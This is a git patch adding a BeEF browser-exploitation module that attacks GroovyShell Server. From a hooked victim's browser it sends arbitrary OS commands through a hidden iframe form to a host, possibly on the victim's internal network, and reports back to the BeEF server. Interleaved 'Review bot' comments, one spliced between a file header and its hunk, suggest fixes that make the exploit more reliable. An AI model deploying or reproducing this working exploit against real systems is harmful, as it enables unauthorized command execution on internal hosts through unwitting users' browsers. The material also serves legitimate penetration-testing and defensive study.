From 7de48ceafb02d0e753efe32c6d60dcc55e0e1eed Mon Sep 17 00:00:00 2001
From: bcoles
Date: Wed, 22 May 2013 02:32:27 +0930
Subject: [PATCH] Add GroovyShell Server Command Execution IPEC exploit module
---
 .../groovyshell_server_cmd_exec/command.js | 43 +++++++++++++++++++
 .../groovyshell_server_cmd_exec/config.yaml | 16 +++++++
 .../groovyshell_server_cmd_exec/module.rb | 22 ++++++++++
 3 files changed, 81 insertions(+)
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/command.js
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/config.yaml
 create mode 100644 modules/exploits/groovyshell_server_cmd_exec/module.rb
diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
new file mode 100644
index 000000000..9eeaf268f
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(groovy_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
new file mode 100644
index 000000000..9ce57c7af
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
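Review bot: `timeout` is interpolated as a string and used unchecked in `setTimeout("cleanup()", timeout*1000)` near the end of the hunk, while `rhost`/`rport` get a malformed-value check a few lines earlier; a non-numeric value makes the delay `NaN`, which setTimeout treats as 0, so the iframe is removed immediately. Add a guard beside the port checks, e.g. `if (!timeout || isNaN(timeout) || timeout < 1) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid timeout'); return; }`. The port check `rport < 0` also admits port 0; `rport < 1` matches the intent of the upper-bound check. `cleanup` is assigned without `var` and invoked through the string form of `setTimeout`, so two instances of this command running in the same page share one global and the later assignment wins; a closure, `setTimeout(function() { document.body.removeChild(groovy_iframe_<%= @command_id %>); }, timeout*1000);`, avoids both the global and the implicit eval.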
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ groovyshell_server_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "GroovyShell Server Command Execution"
+ description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
new file mode 100644
index 000000000..e1dc60f1d
--- /dev/null
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Groovyshell_server_command_execution < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
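Review bot: `post_execute` writes both guards as `if not @datastore['...'].nil?`, which Ruby idiom spells `unless @datastore['...'].nil?`, and the braces around the hash argument are redundant, so each line reduces to `save('result' => @datastore['result']) unless @datastore['result'].nil?`; likewise `self.options` opens with an explicit `return [` where the array literal is already the method's last expression. Neither method carries a comment; a one-liner on `post_execute` such as `# Persist the result or fail string reported back by the hooked browser for this command` would help, since the two keys correspond to the `result=`/`fail=` strings command.js sends. The option hashes mix `'name'=>` and `'ui_label' =>` spacing on the same line; pick one form.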